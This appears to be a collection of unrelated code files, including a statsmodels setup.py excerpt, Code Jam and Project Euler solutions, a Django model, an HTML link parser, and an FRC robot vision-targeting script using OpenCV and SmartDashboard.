        "source": "statsmodels/tsa/exponential_smoothing/_ets_smooth.pyx"
    },  # noqa: E501
    _innovations={"source": "statsmodels/tsa/_innovations.pyx"},
    _hamilton_filter={
        "source": "statsmodels/tsa/regime_switching/_hamilton_filter.pyx.in"
    },  # noqa: E501
    _kim_smoother={
        "source": "statsmodels/tsa/regime_switching/_kim_smoother.pyx.in"
    },  # noqa: E501
    _arma_innovations={
        "source": "statsmodels/tsa/innovations/_arma_innovations.pyx.in"
    },  # noqa: E501
    linbin={"source": "statsmodels/nonparametric/linbin.pyx"},
    _qn={"source": "statsmodels/robust/_qn.pyx"},
    _smoothers_lowess={
        "source": "statsmodels/nonparametric/_smoothers_lowess.pyx"
    },  # noqa: E501
)

# Statespace extensions all share the same include/library configuration
# and are handled by a dedicated loop below.
statespace_exts = [
    "statsmodels/tsa/statespace/_initialization.pyx.in",
    "statsmodels/tsa/statespace/_representation.pyx.in",
    "statsmodels/tsa/statespace/_kalman_filter.pyx.in",
    "statsmodels/tsa/statespace/_filters/_conventional.pyx.in",
    "statsmodels/tsa/statespace/_filters/_inversions.pyx.in",
    "statsmodels/tsa/statespace/_filters/_univariate.pyx.in",
    "statsmodels/tsa/statespace/_filters/_univariate_diffuse.pyx.in",
    "statsmodels/tsa/statespace/_kalman_smoother.pyx.in",
    "statsmodels/tsa/statespace/_smoothers/_alternative.pyx.in",
    "statsmodels/tsa/statespace/_smoothers/_classical.pyx.in",
    "statsmodels/tsa/statespace/_smoothers/_conventional.pyx.in",
    "statsmodels/tsa/statespace/_smoothers/_univariate.pyx.in",
    "statsmodels/tsa/statespace/_smoothers/_univariate_diffuse.pyx.in",
    "statsmodels/tsa/statespace/_simulation_smoother.pyx.in",
    "statsmodels/tsa/statespace/_cfa_simulation_smoother.pyx.in",
    "statsmodels/tsa/statespace/_tools.pyx.in",
]
class CleanCommand(Command):
    """Replacement ``clean`` command that refuses to run.

    Printing the message below and exiting steers users towards
    ``git clean``, which is the supported way to remove build artifacts.
    """

    user_options = []

    def initialize_options(self) -> None:
        pass

    def finalize_options(self) -> None:
        pass

    def run(self) -> None:
        msg = """
python setup.py clean is not supported.
Use one of:
* `git clean -xdf` to clean all untracked files
* `git clean -Xdf` to clean untracked files ignored by .gitignore
"""
        print(msg)
        sys.exit(1)
def update_extension(extension, requires_math=True):
    """Add numpy include dirs (and optionally npymath link info) to *extension*.

    numpy is imported lazily so this module can be imported before numpy is
    installed; callers gate on HAS_NUMPY or defer to build time.
    """
    import numpy as np

    numpy_includes = [np.get_include()]
    # Extra headers historically shipped next to np.core.
    extra_incl = pjoin(dirname(inspect.getfile(np.core)), "include")
    numpy_includes += [extra_incl]
    numpy_includes = list(set(numpy_includes))
    numpy_math_libs = {
        "include_dirs": [np.get_include()],
        "library_dirs": [os.path.join(np.get_include(), '..', 'lib')],
        "libraries": ["npymath"]
    }
    if not hasattr(extension, "include_dirs"):
        # Presumably not a standard Extension object -- nothing to update.
        return
    extension.include_dirs = list(set(extension.include_dirs + numpy_includes))
    if requires_math:
        # Link against numpy's npymath support library.
        extension.include_dirs += numpy_math_libs["include_dirs"]
        extension.libraries += numpy_math_libs["libraries"]
        extension.library_dirs += numpy_math_libs["library_dirs"]
class DeferredBuildExt(build_ext):
    """build_ext command for use when numpy headers are needed."""

    def build_extensions(self):
        # By build time numpy is installed (it is a build requirement), so
        # the include/link fix-up skipped at import time can run now.
        self._update_extensions()
        build_ext.build_extensions(self)

    def _update_extensions(self):
        # Mirror the HAS_NUMPY branch at module level.
        for extension in self.extensions:
            requires_math = extension.name in EXT_REQUIRES_NUMPY_MATH_LIBS
            update_extension(extension, requires_math=requires_math)
cmdclass = {"clean": CleanCommand}
if not HAS_NUMPY:
    # Defer numpy-dependent extension fix-ups until build time.
    cmdclass["build_ext"] = DeferredBuildExt
def check_source(source_name):
    """Chooses C or pyx source files, and raises if C is needed but missing"""
    source_ext = ".pyx"
    if not HAS_CYTHON:
        # No Cython available: fall back to the pre-generated C sources.
        source_name = source_name.replace(".pyx.in", ".c").replace(".pyx", ".c")
        source_ext = ".c"
        if not os.path.exists(source_name):
            raise IOError(
                "C source not found. You must have Cython installed to "
                "build if the C source files have not been generated."
            )
    return source_name, source_ext
def process_tempita(source_name):
    """Runs pyx.in files through tempita is needed"""
    if source_name.endswith("pyx.in"):
        with open(source_name, "r", encoding="utf-8") as templated:
            pyx_template = templated.read()
        pyx = Tempita.sub(pyx_template)
        # Strip the trailing ".in" to get the generated .pyx path.
        pyx_filename = source_name[:-3]
        with open(pyx_filename, "w", encoding="utf-8") as pyx_file:
            pyx_file.write(pyx)
        # Copy the template's timestamps onto the generated file so the
        # output is not considered newer than its template.
        file_stats = os.stat(source_name)
        try:
            os.utime(
                pyx_filename,
                ns=(file_stats.st_atime_ns, file_stats.st_mtime_ns),
            )
        except AttributeError:
            # Platforms without nanosecond stat fields.
            os.utime(pyx_filename, (file_stats.st_atime, file_stats.st_mtime))
        source_name = pyx_filename
    return source_name
EXT_REQUIRES_NUMPY_MATH_LIBS = []
extensions = []
for config in exts.values():
    # NOTE(review): uses_blas is hard-coded True, so every extension below
    # ends up in EXT_REQUIRES_NUMPY_MATH_LIBS -- confirm that is intended.
    uses_blas = True
    source, ext = check_source(config["source"])
    source = process_tempita(source)
    # Module path from the file path, e.g. statsmodels/robust/_qn -> dotted.
    name = source.replace("/", ".").replace(ext, "")
    include_dirs = config.get("include_dirs", [])
    depends = config.get("depends", [])
    libraries = config.get("libraries", [])
    library_dirs = config.get("library_dirs", [])
    uses_numpy_libraries = config.get("numpy_libraries", False)
    if uses_blas or uses_numpy_libraries:
        EXT_REQUIRES_NUMPY_MATH_LIBS.append(name)
    ext = Extension(
        name,
        [source],
        include_dirs=include_dirs,
        depends=depends,
        libraries=libraries,
        library_dirs=library_dirs,
        define_macros=DEFINE_MACROS,
    )
    extensions.append(ext)

for source in statespace_exts:
    source, ext = check_source(source)
    source = process_tempita(source)
    name = source.replace("/", ".").replace(ext, "")
    # Every statespace extension needs the numpy math libraries.
    EXT_REQUIRES_NUMPY_MATH_LIBS.append(name)
    ext = Extension(
        name,
        [source],
        include_dirs=["statsmodels/src"],
        depends=[],
        libraries=[],
        library_dirs=[],
        define_macros=DEFINE_MACROS,
    )
    extensions.append(ext)

if HAS_NUMPY:
    # numpy is importable now: fix include/link paths immediately;
    # otherwise DeferredBuildExt performs this at build time.
    for extension in extensions:
        requires_math = extension.name in EXT_REQUIRES_NUMPY_MATH_LIBS
        update_extension(extension, requires_math=requires_math)

if HAS_CYTHON:
    extensions = cythonize(
        extensions,
        compiler_directives=COMPILER_DIRECTIVES,
        language_level=3,
        force=CYTHON_COVERAGE,
    )
##############################################################################
# Construct package data
##############################################################################
package_data = defaultdict(list)
filetypes = ["*.csv", "*.txt", "*.dta"]
# Any datasets directory containing matching files ships those patterns.
for root, _, filenames in os.walk(
    pjoin(os.getcwd(), "statsmodels", "datasets")
):  # noqa: E501
    matches = []
    for filetype in filetypes:
        for filename in fnmatch.filter(filenames, filetype):
            matches.append(filename)
    if matches:
        package_data[".".join(relpath(root).split(os.path.sep))] = filetypes

# Any directory named "results" anywhere in the tree also ships its data.
for root, _, _ in os.walk(pjoin(os.getcwd(), "statsmodels")):
    if root.endswith("results"):
        package_data[".".join(relpath(root).split(os.path.sep))] = filetypes

for path, filetypes in ADDITIONAL_PACKAGE_DATA.items():
    package_data[path].extend(filetypes)

# A stale MANIFEST can shadow MANIFEST.in; remove it before building.
if os.path.exists("MANIFEST"):
    os.unlink("MANIFEST")
class BinaryDistribution(Distribution):
    """Distribution that always reports itself as platform specific.

    The compiled Cython extensions make the wheels non-pure, so ``is_pure``
    must return False regardless of what setuptools would infer.
    """

    def is_pure(self):
        return False
# Hand everything to setuptools. All metadata constants (DISTNAME, LICENSE,
# etc.) are defined earlier in this file.
setup(
    name=DISTNAME,
    maintainer=MAINTAINER,
    ext_modules=extensions,
    maintainer_email=MAINTAINER_EMAIL,
    description=DESCRIPTION,
    license=LICENSE,
    url=URL,
    download_url=DOWNLOAD_URL,
    project_urls=PROJECT_URLS,
    long_description=LONG_DESCRIPTION,
    classifiers=CLASSIFIERS,
    platforms="any",
    cmdclass=cmdclass,
    packages=find_packages(),
    package_data=package_data,
    distclass=BinaryDistribution,
    include_package_data=False,  # True will install all files in repo
    install_requires=INSTALL_REQUIRES,
    extras_require=EXTRAS_REQUIRE,
    zip_safe=False,
    python_requires=">=3.8",
)
# Clean-up copied files
for copy in FILES_COPIED_TO_PACKAGE:
    os.unlink(copy)
|
def main():
    """Solve every Code Jam case read from stdin and print formatted answers."""
    for case_number, sheep_count in parse_input():
        answer = solve(sheep_count)
        print(f'Case #{case_number}: {answer}')
def parse_input():
    """Yield (case_number, N) pairs read from stdin.

    The first stdin line is the case count T; each following line holds one N.
    """
    case_count = int(input())
    for case_number in range(1, case_count + 1):
        yield case_number, int(input())
def solve(N):
    """Return the last multiple of N counted before all ten digits appear.

    Counting the multiples N, 2N, 3N, ... accumulates seen decimal digits;
    once every digit 0-9 has occurred, the current multiple is the answer.
    N == 0 never produces new digits, hence 'INSOMNIA'.
    """
    if not N:
        return 'INSOMNIA'
    seen_digits = set()
    current = 0
    while len(seen_digits) < 10:
        current += N
        seen_digits.update(str(current))
    return current
if __name__ == '__main__':
    main()  # run only when executed as a script, not on import
|
18,709 | 551a024d06e6490da3c41824d305bb0bc48ec554 | #!/usr/bin/python
from euler.EulerUtils import add, isPermutation, isPrime, isGreater, multiply, isPerfectSquare
from euler.EulerUtils import primes
import math
import sys
from scipy.signal.waveforms import square
def euler7():
    # Project Euler 7: print the 10001st prime, found by trial-testing every
    # integer from 2 upward with isPrime. Python 2 (print statement).
    primesList=[]
    counter=2
    while 1:
        if isPrime(counter):
            primesList.append(counter)
        counter += 1
        if len(primesList) == 10001:
            break
    print primesList[-1]
def euler8():
    # Project Euler 8: greatest product of 5 adjacent digits of the 1000-digit
    # number below. Python 2 (print statement, builtin reduce).
    L = []
    L.append("73167176531330624919225119674426574742355349194934")
    L.append("96983520312774506326239578318016984801869478851843")
    L.append("85861560789112949495459501737958331952853208805511")
    L.append("12540698747158523863050715693290963295227443043557")
    L.append("66896648950445244523161731856403098711121722383113")
    L.append("62229893423380308135336276614282806444486645238749")
    L.append("30358907296290491560440772390713810515859307960866")
    L.append("70172427121883998797908792274921901699720888093776")
    L.append("65727333001053367881220235421809751254540594752243")
    L.append("52584907711670556013604839586446706324415722155397")
    L.append("53697817977846174064955149290862569321978468622482")
    L.append("83972241375657056057490261407972968652414535100474")
    L.append("82166370484403199890008895243450658541227588666881")
    L.append("16427171479924442928230863465674813919123162824586")
    L.append("17866458359124566529476545682848912883142607690042")
    L.append("24219022671055626321111109370544217506941658960408")
    L.append("07198403850962455444362981230987879927244284909188")
    L.append("84580156166097919133875499200524063689912560717606")
    L.append("05886116467109405077541002256983155200055935729725")
    L.append("71636269561882670428252483600823257530420752963450")
    # One flat list of single-character digits.
    numbers = list(''.join(L))
    productList = []
    print numbers
    for index_i in range(len(numbers)):
        # Stop once fewer than 5 digits remain in the window.
        if index_i > len(numbers)-5:
            break
        number=[int(j) for j in numbers[index_i:index_i+5]]
        print number, index_i
        productList.append(reduce(multiply,number))
    # isGreater acts as a max() reduction over the window products.
    print reduce(isGreater,productList)
def euler9():
    # a2 + b2 = c2; a+b+c=1000
    # Project Euler 9: search perfect squares i=a^2, j=b^2 whose sum is also a
    # perfect square, with a+b+c == 1000, then print a*b*c.
    # NOTE(review): the float equality `... == 1000` and the O(n) list
    # membership test both look fragile/slow; an integer search over a,b with
    # c = 1000-a-b would be more robust — confirm before reuse.
    squaresList=[]
    for i in range(4,1000000):
        if isPerfectSquare(i):
            squaresList.append(i)
    for i in squaresList:
        # Only pair each square with the ones after it to avoid duplicates.
        for jIndex in range(squaresList.index(i)+1, len(squaresList)):
            j=squaresList[jIndex]
            potentialK=i+j
            if potentialK in squaresList and math.sqrt(i)+math.sqrt(j)+math.sqrt(potentialK) ==1000:
                print math.sqrt(i)*math.sqrt(j)*math.sqrt(potentialK)
def euler10():
    # Project Euler 10 (first attempt): sum primes below 200000 by per-number
    # primality testing. NOTE(review): the problem asks for primes below two
    # million; euler10_ below is the version main() actually calls.
    sum=0
    for i in range(200000):
        if isPrime(i):
            sum += i
    print sum
def euler10_():
    # Project Euler 10: sum of all primes below two million, using the
    # primes() helper from EulerUtils and an add-reduction.
    returnList = primes(2000000)
    # print returnList
    print reduce(add,returnList)
def main():
    # Command line args are in sys.argv[1], sys.argv[2] ..
    # sys.argv[0] is the script name itself and can be ignored
    # Uncomment the problem you want to run; only euler10_ runs by default.
    # euler7()
    # euler8()
    # euler9()
    euler10_()
if __name__ == '__main__':
    main()  # run only when executed as a script, not on import
|
18,710 | a7226ccfe8173f87fe3027c4302e806b5fcff5bc | from django.db import models
class Word(models.Model):
    """A single entry in the word base."""

    # Required human-readable word text (blank values rejected by forms).
    name = models.CharField(
        max_length=128,
        blank=False,
        verbose_name="Word's name",
    )

    def __str__(self):
        # Show the word itself in the admin and any string context.
        return str(self.name)
|
18,711 | bfe40ee4373711eed54b14e624326e07e383ca2e | #coding:utf-8
#siddontang@gmail.com
import traceback
from sgmllib import SGMLParser
class URLLister(SGMLParser):
    """Collects absolute http(s...) anchors and image sources from HTML.

    Python 2 only: sgmllib (and the print statement used below) were removed
    in Python 3.
    """
    def __init__(self):
        SGMLParser.__init__(self)
        self._clear()
    def feed(self, data):
        # Parse more HTML; parser errors are printed but never propagated.
        try:
            SGMLParser.feed(self, data)
        except Exception:
            print 'SGMLParser error %s' % traceback.format_exc()
    def reset(self):
        # SGMLParser.reset() is also called from its __init__.
        SGMLParser.reset(self)
        self._clear()
    def getUrls(self):
        # All <a href="http..."> values seen so far.
        return self._urls
    def getImgs(self):
        # All <img src="http..."> values seen so far.
        return self._imgs
    def _clear(self):
        self._urls = []
        self._imgs = []
    def start_a(self, attrs):
        # Keep only absolute links (href starting with "http").
        href = [ v for k,v in attrs if k=="href" and v.startswith("http")]
        if href:
            self._urls.extend(href)
    def start_img(self, attrs):
        # Keep only absolute image sources (src starting with "http").
        src = [ v for k,v in attrs if k=="src" and v.startswith("http") ]
        if src:
            self._imgs.extend(src)
if __name__ == '__main__':
    # Smoke test: fetch qq.com and print every absolute image URL found.
    # Python 2 syntax throughout (urllib2, `except ..., e`, print statement).
    import urllib2
    try:
        f = urllib2.urlopen('http://www.qq.com').read()
        urlLister = URLLister()
        urlLister.feed(f)
        urls = urlLister.getUrls()
        imgs = urlLister.getImgs()
        for img in imgs:
            print img
    except urllib2.URLError, e:
        print e.reason
|
18,712 | cbefee282dc0db920978239628d593a2b521a0f8 | #!/usr/bin/python
#Team3238 Cyborg Ferrets 2014 Object Detection Code
#Start with
#python image_processor.py 'path/to/image.jpg'
#don't pass an image argument to use the VideoCapture(0) stream.
# Video capture mode updates the frame to process every video_pause milliseconds, so adjust that.
#set enable_dashboard = True to send range and bearing over smart dashboard network_tables interface.
#set show_windows = False for on-robot, no monitor processing on pandaboard.
#This code is a merge of vision_lib.py, bearing_formula.py, distance_formula.py and team341 java vision detection code from (2012?) competition.
#java -jar SmartDashboard ip 127.0.0.1, for example, will start the dashboard if running on this same host.
#Now tuned for green leds.
#expected camera settings (sorry no numbers on camera interface.)
# exposure -> far right
# gain -> far left
# brightness ~ 20% from left
# contrast ~ 20% from left
# color intensity ~ 18% from left
enable_dashboard = True  # publish tuning values and results over SmartDashboard
show_windows = False  # True opens debug windows; keep False for headless on-robot use
window_scale = 0.5  # debug windows are drawn at half the camera resolution
window_size = (int(640*window_scale), int(480*window_scale))
from cv2 import *
import numpy as np
import sys
import math
import commands
if enable_dashboard:
from pynetworktables import *
# Connect to the SmartDashboard network tables before any Put/Get calls.
if enable_dashboard:
    SmartDashboard.init()
#pretend the robot is on the network reporting its heading to the SmartDashboard,
# then let the SmartDashboard user modify it and send it back to this code to simulate movement.
camera_exposure_title = 'Camera Exposure:'  # SmartDashboard key for the exposure setting
# SmartDashboard keys for the live-tunable parameters. Apart from
# camera_exposure_title (defined above), these keys were referenced throughout
# the class but never defined anywhere in this file, which raised NameError as
# soon as the dashboard code ran; they are defined here with readable labels.
angle_to_robot_title = 'Angle To Robot:'
camera_offset_position_title = 'Camera Offset Position:'
morph_close_iterations_title = 'Morph Close Iterations:'
angle_to_shooter_title = 'Angle To Shooter:'
camera_color_intensity_title = 'Camera Color Intensity:'
camera_saturation_title = 'Camera Saturation:'
camera_contrast_title = 'Camera Contrast:'
camera_color_hue_title = 'Camera Color Hue:'
camera_brightness_title = 'Camera Brightness:'
camera_gain_title = 'Camera Gain:'
robot_heading_title = 'Robot Heading:'

class ImageProcessor:
    """Finds the retro-reflective vision target in camera frames.

    Pipeline per frame: HSV split -> per-channel band threshold -> AND of the
    three masks -> morphological close -> contours -> bounding-box/aspect
    filtering -> pick the lowest candidate in the frame -> compute range and
    bearing and (optionally) publish them over SmartDashboard.
    """
    #all these values could be put into the SmartDashboard for live tuning as conditions change.
    default_shape = (480,640,3)
    # Pre-allocated placeholder frames so the debug windows can be laid out
    # before the first real frame arrives.
    h = np.zeros(default_shape, dtype=np.uint8)
    s = np.zeros(default_shape, dtype=np.uint8)
    v = np.zeros(default_shape, dtype=np.uint8)
    combined = np.zeros(default_shape, dtype=np.uint8)
    img = np.zeros(default_shape, dtype=np.uint8)
    # Debug window titles.
    h_title = "hue"
    s_title = "sat"
    v_title = "val"
    combined_title = "Combined + Morphed"
    targets_title = "Targets"
    #for video capture mode, what approx frame rate do we want? frame rate = approx video_pause + processing time
    video_pause = 1 #0 milliseconds means wait for key press; waitKey takes an integer so 1 ms is the minimum here.
    # Band thresholds tuned for the green LEDs with the camera settings noted
    # at the top of this file. (Red would need OR-ing an inverted threshold
    # because red hue wraps around 0.)
    hue_delta = 15
    sat_delta = 25
    val_delta = 100
    hue_thresh = 80
    sat_thresh = 233
    val_thresh = 212
    max_thresh = 255
    #used for the morphologyEx close that fills in pixels prior to finding contours.
    kernel = getStructuringElement(MORPH_RECT, (2,2), anchor=(1,1))
    morph_close_iterations = 9
    #colors in BGR format for drawing the targets over the image.
    selected_target_color = (0,0,255)
    passed_up_target_color = (255,0,0)
    possible_target_color = (0,255,0)
    #used to judge whether a polygon side is near vertical or near horizontal.
    vert_threshold = math.tan(math.radians(90-20))
    horiz_threshold = math.tan(math.radians(20))
    # Aspect-ratio window; currently wide open to accept both horizontal and
    # vertical targets.
    max_target_aspect_ratio = 10 # 1.0 # top target is expected to be 24.5 in x 4 in.
    min_target_aspect_ratio = 0.1 #0.01# 3# 0.5
    angle_to_robot = 0 #camera's 0 bearing to robot's 0 bearing
    camera_offset_position = 0
    angle_to_shooter = 0 #camera's 0 bearing to shooter's 0 bearing
    # Camera hardware settings (initial values; all live-tunable when the
    # dashboard is enabled).
    camera_color_intensity = 0
    camera_saturation = 0
    camera_contrast = 0
    camera_color_hue = 0
    camera_brightness = 20
    camera_gain = 0
    camera_exposure = 20
    robot_heading = 0.0 #input from SmartDashboard if enabled, else hard coded here.
    x_resolution = 640 #needs to match the camera.
    y_resolution = 480
    field_of_view_degrees = 26.4382 # vertical field of view
    theta = math.radians(field_of_view_degrees/2.0) #half the field of view, in radians for math.tan
    real_target_height = 28.5 # inches; NOTE(review): may not match the current robot/target -- confirm.

    def __init__(self, img_path):
        """img_path: still image to process repeatedly, or None for VideoCapture(0)."""
        self.img_path = img_path
        self.layout_result_windows(self.h, self.s, self.v)
        self.vc = VideoCapture(0)
        # Guarded: the original published unconditionally, which raised
        # NameError whenever enable_dashboard was False (pynetworktables
        # is only imported when the dashboard is enabled).
        if enable_dashboard:
            # Publish the initial tuning values so they can be edited live.
            SmartDashboard.PutNumber(angle_to_robot_title, self.angle_to_robot)
            SmartDashboard.PutNumber(camera_offset_position_title, self.camera_offset_position)
            SmartDashboard.PutNumber(morph_close_iterations_title, self.morph_close_iterations)
            SmartDashboard.PutNumber(angle_to_shooter_title, self.angle_to_shooter)
            SmartDashboard.PutNumber(camera_color_intensity_title, self.camera_color_intensity)
            SmartDashboard.PutNumber(camera_exposure_title, self.camera_exposure)
            # Fixed typos from the original: the key was written
            # `camera_saturation.title` and the values `self.saturation` /
            # `self.contrast`, none of which exist.
            SmartDashboard.PutNumber(camera_saturation_title, self.camera_saturation)
            SmartDashboard.PutNumber(camera_contrast_title, self.camera_contrast)
            SmartDashboard.PutNumber(camera_color_hue_title, self.camera_color_hue)
            SmartDashboard.PutNumber(camera_brightness_title, self.camera_brightness)
            SmartDashboard.PutNumber(camera_gain_title, self.camera_gain)
            SmartDashboard.PutNumber(robot_heading_title, self.robot_heading)

    def video_feed(self):
        """Main loop: process the current frame, then grab the next one from
        either the still image (img_path) or the live camera stream."""
        while True:
            if self.img is not None:
                self.process()
            if self.img_path is None:
                rval, self.img = self.vc.read() #may set self.img to None on a dropped frame
            else:
                self.img = imread(self.img_path)

    def process(self):
        """Run the full detection pipeline on self.img."""
        if enable_dashboard:
            # Pull the latest operator-tuned values from the dashboard.
            # (Every line below was missing its closing parenthesis in the
            # original, which made the whole file a syntax error; the
            # `camera_offset_postion` attribute typo is also fixed.)
            self.camera_saturation = int(SmartDashboard.GetNumber(camera_saturation_title))
            self.angle_to_robot = int(SmartDashboard.GetNumber(angle_to_robot_title))
            self.camera_offset_position = int(SmartDashboard.GetNumber(camera_offset_position_title))
            self.morph_close_iterations = int(SmartDashboard.GetNumber(morph_close_iterations_title))
            self.angle_to_shooter = int(SmartDashboard.GetNumber(angle_to_shooter_title))
            self.camera_color_intensity = int(SmartDashboard.GetNumber(camera_color_intensity_title))
            self.camera_contrast = int(SmartDashboard.GetNumber(camera_contrast_title))
            self.camera_color_hue = int(SmartDashboard.GetNumber(camera_color_hue_title))
            self.camera_brightness = int(SmartDashboard.GetNumber(camera_brightness_title))
            self.camera_exposure = int(SmartDashboard.GetNumber(camera_exposure_title))
            self.camera_gain = int(SmartDashboard.GetNumber(camera_gain_title))
        if self.img_path is None:
            # Live camera: force manual exposure mode, then set the exposure.
            commands.getoutput(" yavta --set-control '0x009a0901 1' /dev/video0")
            #print(commands.getoutput(" yavta --get-control '0x009a0901' /dev/video0") )
            commands.getoutput("yavta --set-control '0x009a0902 %s' /dev/video0" % self.camera_exposure)
            #print(commands.getoutput(" yavta --get-control '0x009a0902' /dev/video0"))
        self.hsv = cvtColor(self.img, cv.CV_BGR2HSV)
        self.h, self.s, self.v = split(self.hsv)
        # Band-pass each channel around its tuned center value.
        self.h_clipped = self.threshold_in_range(self.h, self.hue_thresh-self.hue_delta, self.hue_thresh+self.hue_delta)
        self.s_clipped = self.threshold_in_range(self.s, self.sat_thresh-self.sat_delta, self.sat_thresh+self.sat_delta)
        self.v_clipped = self.threshold_in_range(self.v, self.val_thresh-self.val_delta, self.val_thresh+self.val_delta)
        if show_windows:
            imshow(self.h_title, resize(self.h_clipped, window_size))
            imshow(self.s_title, resize(self.s_clipped, window_size))
            imshow(self.v_title, resize(self.v_clipped, window_size))
        self.find_targets()
        # 'q' quits; waitKey also paces the loop (see video_pause).
        if waitKey(self.video_pause) == ord('q'):
            exit(1)

    def layout_result_windows(self, h, s, v):
        """Create all debug windows up front (no-op when show_windows is False)."""
        if show_windows:
            imshow(self.h_title, resize(h, window_size))
            imshow(self.s_title, resize(s, window_size))
            imshow(self.v_title, resize(v, window_size))
            imshow(self.combined_title, resize(self.combined, window_size))
            imshow(self.targets_title, resize(self.img, window_size))

    def update_hue_threshold(self, thresh):
        """Trackbar callback: re-threshold hue around `thresh` and re-detect."""
        delta = 15
        self.h_clipped = self.threshold_in_range(self.h, thresh-delta, thresh+delta)
        imshow(self.h_title, self.h_clipped)
        self.find_targets()

    def update_sat_threshold(self, thresh):
        """Trackbar callback: re-threshold saturation around `thresh` and re-detect."""
        delta = 25
        self.s_clipped = self.threshold_in_range(self.s, thresh-delta, thresh+delta)
        imshow(self.s_title, self.s_clipped)
        self.find_targets()

    def update_val_threshold(self, thresh):
        """Trackbar callback: re-threshold value around `thresh` and re-detect."""
        delta = 100
        self.v_clipped = self.threshold_in_range(self.v, thresh-delta, thresh+delta)
        imshow(self.v_title, self.v_clipped)
        self.find_targets()

    def threshold_in_range(self, img, low, high):
        """Binary mask of pixels with low <= value <= high (band-pass)."""
        unused, above = threshold(img, low, self.max_thresh, THRESH_BINARY)
        unused, below = threshold(img, high, self.max_thresh, THRESH_BINARY_INV)
        return bitwise_and(above, below)

    def find_targets(self):
        """Combine the channel masks, close gaps, pick the lowest plausible
        target in the frame, and compute aim data for it."""
        self.reset_targeting()
        #combine all the masks together to get their overlapping regions.
        self.combined = bitwise_and(self.h_clipped, bitwise_and(self.s_clipped, self.v_clipped))
        # To ignore the hue channel (red LEDs wrap around hue 0) use instead:
        #self.combined = bitwise_and(self.s_clipped, self.v_clipped)
        self.combined = morphologyEx(src=self.combined, op=MORPH_CLOSE, kernel=self.kernel, iterations=self.morph_close_iterations)
        if show_windows:
            imshow(self.combined_title, resize(self.combined, window_size))
        # findContours modifies its input, so work on a copy.
        self.contoured = self.combined.copy()
        contours, heirarchy = findContours(self.contoured, RETR_LIST, CHAIN_APPROX_TC89_KCOS)
        polygon_tuples = self.contours_to_polygon_tuples(contours)
        polygons = [self.unpack_polygon(t) for t in polygon_tuples]
        for polygon_tuple in polygon_tuples:
            self.mark_correct_shape_and_orientation(polygon_tuple)
        if self.selected_target is not None:
            self.draw_target(self.lowest_found_so_far_x, self.lowest_found_so_far, self.selected_target_color)
            drawContours(self.drawing, contours, -1, self.selected_target_color, thickness=10)
            self.aim()
        if show_windows:
            imshow(self.targets_title, resize(self.drawing, window_size))
        if enable_dashboard:
            SmartDashboard.PutNumber("Potential Targets:", len(polygons))
        print("Potential Targets:", len(polygons))

    def aim(self):
        """Compute range/bearing for the selected target and publish them."""
        if enable_dashboard:
            self.robot_heading = SmartDashboard.GetNumber(robot_heading_title)
        polygon, x, y, w, h = self.selected_target
        self.target_bearing = self.get_bearing(x + w/2.0)
        self.target_range = self.get_range(x, y, w, h)
        #self.target_elevation = self.get_elevation(x, y, w, h)
        print("Range = " + str(self.target_range))
        print("Bearing = " + str(self.target_bearing))
        if enable_dashboard:
            SmartDashboard.PutNumber("Target Range:", self.target_range)
            SmartDashboard.PutNumber("Target Bearing:", self.target_bearing)
            # Elevation is never recomputed (see the commented call above), so
            # this always reports the reset value of 0.
            SmartDashboard.PutNumber("Target Elevation:",self.target_elevation)
            SmartDashboard.PutString("Target: ","Acquired!")

    def get_bearing(self, target_center_x):
        """Degrees off the shooter's axis for a target at pixel x-center."""
        return (self.field_of_view_degrees/self.x_resolution)*(target_center_x-(self.x_resolution/2))-self.angle_to_shooter

    def get_range(self, x, y, w, h):
        """Distance to the target from its bounding box (uses height only)."""
        if enable_dashboard:
            SmartDashboard.PutNumber("TargetWidth: ",w)
            SmartDashboard.PutNumber("TargetHeight",h)
            SmartDashboard.PutNumber("TargetX",x)
            SmartDashboard.PutNumber("TargetY",y)
        return self.distance(h)

    def distance(self, pix_height):
        """Pinhole-camera range estimate from the target's pixel height."""
        fovr = self.x_resolution * self.real_target_height / pix_height
        if enable_dashboard:
            SmartDashboard.PutNumber("FieldOfViewReal", fovr) # = 2w_real
            SmartDashboard.PutNumber("TanTheta", math.tan(self.theta))
            SmartDashboard.PutNumber("fovr/tan(theta)", fovr/math.tan(self.theta))
        return self.real_target_height*self.y_resolution/(2*pix_height*math.tan(self.theta))

    def reset_targeting(self):
        """Clear per-frame targeting state before a new detection pass."""
        if enable_dashboard:
            SmartDashboard.PutString("Target: ","lost...")
        self.drawing = self.img.copy()
        self.selected_target = None
        self.lowest_found_so_far_x = None
        self.lowest_found_so_far = 0
        self.target_range = 0
        self.target_bearing = -1
        self.target_elevation = 0

    def mark_correct_shape_and_orientation(self, polygon_tuple):
        """Track the candidate lowest in the frame (image y grows downward, so
        larger center_y means lower, i.e. closest). The shape filter is
        currently disabled (`if True`); re-enable the commented condition once
        it is tuned."""
        p,x,y,w,h = polygon_tuple
        if True: #isContourConvex(p) and 4==len(p) and self.slope_angles_correct(p):
            center_x = int(x + w/2.0)
            center_y = int(y + h/2.0)
            self.draw_target(center_x, center_y, self.possible_target_color)
            if center_y > self.lowest_found_so_far:
                self.selected_target = polygon_tuple
                self.lowest_found_so_far = center_y
                self.lowest_found_so_far_x = center_x
        else:
            # Unreachable while the filter above is disabled.
            drawContours(self.drawing, [p.astype(np.int32)], -1, self.passed_up_target_color, thickness=7)

    def draw_target(self, center_x, center_y, a_color):
        """Draw a crosshair at the given center on the overlay image."""
        radius = 10
        a_thickness = 5
        line(self.drawing, (center_x - radius, center_y), (center_x + radius, center_y), color=a_color, thickness=a_thickness)
        line(self.drawing, (center_x, center_y-radius), (center_x, center_y+radius), color=a_color, thickness=a_thickness)

    def slope_angles_correct(self, polygon):
        """True when a 4-gon has >=1 near-horizontal and exactly 2 near-vertical sides."""
        num_near_vert, num_near_horiz = 0,0
        for line_starting_point_index in xrange(0,4):  # xrange: this file targets Python 2
            slope = self.get_slope(polygon, line_starting_point_index)
            if slope < self.horiz_threshold:
                num_near_horiz += 1
            if slope > self.vert_threshold:
                num_near_vert += 1
        return 1 <= num_near_horiz and 2 == num_near_vert

    def get_slope(self, p, line_starting_point_index):
        """Absolute slope of the polygon side starting at the given vertex
        (sys.float_info.max stands in for a vertical side)."""
        line_ending_point_index = (line_starting_point_index+1)%4
        dy = p[line_starting_point_index, 0, 1] - p[line_ending_point_index, 0, 1]
        dx = p[line_starting_point_index, 0, 0] - p[line_ending_point_index, 0, 0]
        slope = sys.float_info.max
        if 0 != dx:
            slope = abs(float(dy)/dx)
        return slope

    def unpack_polygon(self,t):
